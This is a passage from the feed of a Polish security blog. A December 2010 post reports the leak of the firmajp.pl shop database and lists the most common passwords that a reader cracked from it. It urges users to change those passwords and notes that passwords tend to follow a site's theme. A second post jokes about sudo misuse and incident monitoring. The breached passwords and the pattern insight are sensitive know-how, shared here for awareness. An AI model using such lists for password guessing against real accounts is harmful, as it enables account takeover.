It&#39;s &amp;nbsp;hard &amp;nbsp;to harden a system [&lt;s&gt;Linux?&lt;/s&gt; FreeBSD? &quot;Carder.cc box&quot;?] when everything is backdoored and unfortunately we are just too ninja to get stopped by your silly protections. You can never stop us. We will always &amp;nbsp;keep owning and exp0sing you.&lt;/blockquote&gt;
Jestem ciekaw, co myślicie na temat tej sugestii?&lt;br /&gt;
&lt;br /&gt;
Bardziej szczegółowo zajmiemy się dziś natomiast przypadkiem ataku na jeden z naszych rodzimych serwisów, sklep internetowy firmajp.pl. Otóż w ostatnim czasie doszło do skutecznego ataku na ten serwis oferujący ubrania i gadżety dla młodzieży utożsamiającej się z ideałami JP/HWDP. Intruzowi udało się m.in. wejść w posiadanie bazy danych serwisu, która następnie została udostępniona w sieci.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5WCW2ku0aNNrmUz4lFRUJDQfCcyMCqCKUF7d8iKjG6qOKueorxvzFm4K_VwH5m4EcvrcAk_yZKHQH59IzkUHncZrPuMug3W8fMd7M-5aL2TmOdYRNc4VcyXfDSjC5skQylAIVng7Nt2A/s1600/firmaJP01.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;286&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5WCW2ku0aNNrmUz4lFRUJDQfCcyMCqCKUF7d8iKjG6qOKueorxvzFm4K_VwH5m4EcvrcAk_yZKHQH59IzkUHncZrPuMug3W8fMd7M-5aL2TmOdYRNc4VcyXfDSjC5skQylAIVng7Nt2A/s320/firmaJP01.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Jeden z czytelników (podziękowania dla agilobable) HCSL pokusił się natomiast o odzyskanie sporej ilości (5268) haseł ze skrótów zapisanych w tejże bazie, dzięki czemu możemy przedstawić listę najpopularniejszych haseł stosowanych przez użytkowników tegoż nietypowego sklepu (hasło - ilość wystąpień):&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;ul&gt;
&lt;li&gt;firmajp - 79&lt;/li&gt;
&lt;li&gt;firma - 44&lt;/li&gt;
&lt;li&gt;123456 - 44&lt;/li&gt;
&lt;li&gt;polska lub polska1 - 42&lt;/li&gt;
&lt;li&gt;jebacpolicje - 31&lt;/li&gt;
&lt;li&gt;prosto - 27&lt;/li&gt;
&lt;li&gt;chwdp lub chwdp1 - 23&lt;/li&gt;
&lt;li&gt;zaq12wsx - 19&lt;/li&gt;
&lt;li&gt;cracovia - 17&lt;/li&gt;
&lt;li&gt;qwerty - 15&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
Użytkownikom serwisu firmajp.pl przypominamy, że obecnie każdy może być w posiadaniu wspomnianej bazy, wobec czego należy jak najszybciej zmienić wszystkie hasła identyczne lub podobne, do tych użytych w ramach sklepu JP. Zaś osoby zainteresowana tematyką praktycznego testowania bezpieczeństwa haseł z pewnością już zauważyły kilka interesujących prawidłowości.&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Powyższa statystyka haseł oczywiście potwierdza to, że użytkownicy serwisów internetowych &lt;a href=&quot;http://www.hcsl.pl/2010/06/jakie-hasa-najczesciej-stosuja-polscy.html&quot;&gt;bardzo często wybierają hasła proste&lt;/a&gt; do złamania lub nawet odgadnięcia. Powyższy przykład potwierdza również to, że hasła tworzone przez internautów bardzo &lt;a href=&quot;http://www.hcsl.pl/2010/09/analiza-wzorcow-hase-przyszoscia-atakow.html&quot;&gt;często charakteryzują się pewnymi określonymi wzorcami&lt;/a&gt; (takimi jak pojedyncza cyfra dodawana na końcu frazy uwierzytelniającej, najczęściej zaś jest to cyfra &quot;1&quot;).&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Poza tym, powyższy przykład świetnie obrazuje również to, że hasła użytkowników są bardzo często zależne od tematyki, a nawet samej nazwy serwisu lub systemu informatycznego. Bardzo dobrze wiedzą o tym komputerowi przestępcy oraz pentesterzy, dlatego też chcąc utworzyć hasło trudne do złamania, należy zawsze unikać jakichkolwiek nawiązań do samego serwisu oraz jego przeznaczenia. Najlepiej zaś do czasu upowszechnienia się innych &lt;a href=&quot;http://www.hcsl.pl/2010/11/ciekawy-i-zaskakujaco-bezpieczny-sposob.html&quot;&gt;obiecujących metod uwierzytelniania&lt;/a&gt;, opracować jakiś własny &lt;a href=&quot;http://www.hcsl.pl/2010/03/superbezpieczne-hasa-zapisane-na-zotej.html&quot;&gt;system tworzenia silnych i unikalnych haseł&lt;/a&gt;.&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicoxCn6YzYHCZTYpyoF7GBm6GZdlygBFdIuHZbSc_jgW7fdwdENYjgS0O1iCMtYZvp07-I-VUGbltahEuP06399dRUNZvqEi3r-uBmBjUQpogQRAhXT__Xqbpqmr8rKusEKH4DbCe5XNw/s1600/firmaJP02.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;247&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicoxCn6YzYHCZTYpyoF7GBm6GZdlygBFdIuHZbSc_jgW7fdwdENYjgS0O1iCMtYZvp07-I-VUGbltahEuP06399dRUNZvqEi3r-uBmBjUQpogQRAhXT__Xqbpqmr8rKusEKH4DbCe5XNw/s400/firmaJP02.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hcseclab.blogspot.com/feeds/1389772686804395276/comments/default' title='Komentarze do posta'/><link rel='replies' type='text/html' href='http://hcseclab.blogspot.com/2010/12/zaleznosc-hase-od-tematyki-serwisu.html#comment-form' title='Komentarze (0)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4511012464226103155/posts/default/1389772686804395276'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4511012464226103155/posts/default/1389772686804395276'/><link rel='alternate' type='text/html' href='http://hcseclab.blogspot.com/2010/12/zaleznosc-hase-od-tematyki-serwisu.html' title='Zależność haseł od tematyki serwisu internetowego'/><author><name>\m/ojtek</name><uri>http://www.blogger.com/profile/00686678747901186941</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3kPKADUZjOVHLatr652Rn3sSYbK4nJahwcOl4VKk7SqP2zGIxUqZnxpvl45cvn_NGlAw7lyEV4CDIE58SyCxwGnRy1rEZNCjgKWu5NO0BCnsw-9s3cNevdmM3puj1RJ4/s220/P1010377.JPG'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGYVIjW0BgWylhK94P9KL2ALP8lMPvqg6OhkGWJbM-nY4qKjWV6DGV_1L6Tf0_uYM7ACfldJNs9NS-7cVCgcbtVMZx0-zG6yhXcK-OTG_ylzVEaMsE4BKV7SqV3iQ4Ifrkd6dCZq_B5pw/s72-c/firmaJP.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4511012464226103155.post-378453299842456102</id><published>2010-12-25T16:29:00.003+01:00</published><updated>2010-12-25T16:47:43.321+01:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Bezpieczeństwo systemów operacyjnych"/><category scheme="http://www.blogger.com/atom/ns#" term="Inne"/><category scheme="http://www.blogger.com/atom/ns#" term="Obrona - Atak"/><title type='text'>Czym grozi nieuprawnione użycie sudo? [Have a safe Xmas!]</title><content type='html'>&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;a href=&quot;http://www.hcsl.pl/2010/12/czym-grozi-nieuprawnione-uzycie-sudo.html&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 0em; margin-right: 0em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiF7lnvBVsiJqqtt_iTpsWCkqnHvvFJ1afh7SZSaonsSQQYRc3yWm1BMZok8x9aoIJoifiv_UHMl9b7EkFBxY6I1l4lPmakQG_E33Rwv0pdZLo0STpC22fw2MaP41NkVoEwx3LItU4HoYE/s1600/Xmas.png&quot; /&gt;&lt;/a&gt;Sudo to popularny program obecny w rozmaitych systemach operacyjnych Linux i Unix, stosowany najczęściej w celu delegowania uprawnień administracyjnych na poszczególnych użytkowników systemu. Możliwość korzystania z tego przydatnego narzędzia konfigurujemy zazwyczaj poprzez umieszczenie odpowiednich wpisów w pliku &lt;i&gt;/etc/sudoers&lt;/i&gt;, określając w ten sposób które programy poszczególni użytkownicy mogą za pomocą sudo uruchamiać. Czy zastanawialiście się jednak, co się tak naprawdę dzieje, gdy próbujecie za pomocą sudo uzyskać nienależne wam uprawnienia?&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Oczywiście próba uzyskania nienależnych uprawnień może narazić nas na surowe konsekwencje:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmWrSFWL1TRb2uuT8NbIWVg6ILVljY-DOEGh0y2fdGvNX3NgNOIv81Q8TlnbOMQp1d72JmEldQN3L8JuX0CvQf2p5VSsuxwTM01EL9q4dLvg1biHCun6wWLDvYtSznMuspAhFQc-HPVYk/s1600/Xmas01.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;283&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmWrSFWL1TRb2uuT8NbIWVg6ILVljY-DOEGh0y2fdGvNX3NgNOIv81Q8TlnbOMQp1d72JmEldQN3L8JuX0CvQf2p5VSsuxwTM01EL9q4dLvg1biHCun6wWLDvYtSznMuspAhFQc-HPVYk/s640/Xmas01.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Abstrahując od świątecznych żartów, taki przypadek może być w danej organizacji rzeczywiście uznawany za incydent bezpieczeństwa, zaś za monitorowanie tego typu zdarzeń odpowiedzialny będzie najprawdopodobniej zespół zajmujący się tak zwanym aktywnym monitoringiem bezpieczeństwa.&lt;br /&gt;
&lt;br /&gt;
Jestem ciekaw, czy wiecie, kto w waszej organizacji zajmuje się monitoringiem tego typu zdarzeń, jeśli oczywiście aktywny monitoring jest w ogóle prowadzony? Jeśli macie jakieś interesujące wspomnienia związane z podobnymi przypadkami i incydentami, jak zwykle zachęcam do podzielenia się nimi ze wszystkimi czytelnikami za pomocą komentarzy!&lt;br /&gt;
&lt;br /&gt;
[&lt;a href=&quot;http://www.xkcd.com/838/&quot;&gt;źródło&lt;/a&gt;]&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hcseclab.blogspot.com/feeds/378453299842456102/comments/default' title='Komentarze do posta'/><link rel='replies' type='text/html' href='http://hcseclab.blogspot.com/2010/12/czym-grozi-nieuprawnione-uzycie-sudo.html#comment-form' title='Komentarze (0)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4511012464226103155/posts/default/378453299842456102'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4511012464226103155/posts/default/378453299842456102'/><link rel='alternate' type='text/html' href='http://hcseclab.blogspot.com/2010/12/czym-grozi-nieuprawnione-uzycie-sudo.html' title='Czym grozi nieuprawnione użycie sudo? [Have a safe Xmas!]'/><author><name>\m/ojtek</name><uri>http://www.blogger.com/profile/00686678747901186941</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3kPKADUZjOVHLatr652Rn3sSYbK4nJahwcOl4VKk7SqP2zGIxUqZnxpvl45cvn_NGlAw7lyEV4CDIE58SyCxwGnRy1rEZNCjgKWu5NO0BCnsw-9s3cNevdmM3puj1RJ4/s220/P1010377.JPG'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiF7lnvBVsiJqqtt_iTpsWCkqnHvvFJ1afh7SZSaonsSQQYRc3yWm1BMZok8x9aoIJoifiv_UHMl9b7EkFBxY6I1l4lPmakQG_E33Rwv0pdZLo0STpC22fw2MaP41NkVoEwx3LItU4HoYE/s72-c/Xmas.png" height="72" width="72"/><thr:total>0</thr:total></entry></feed>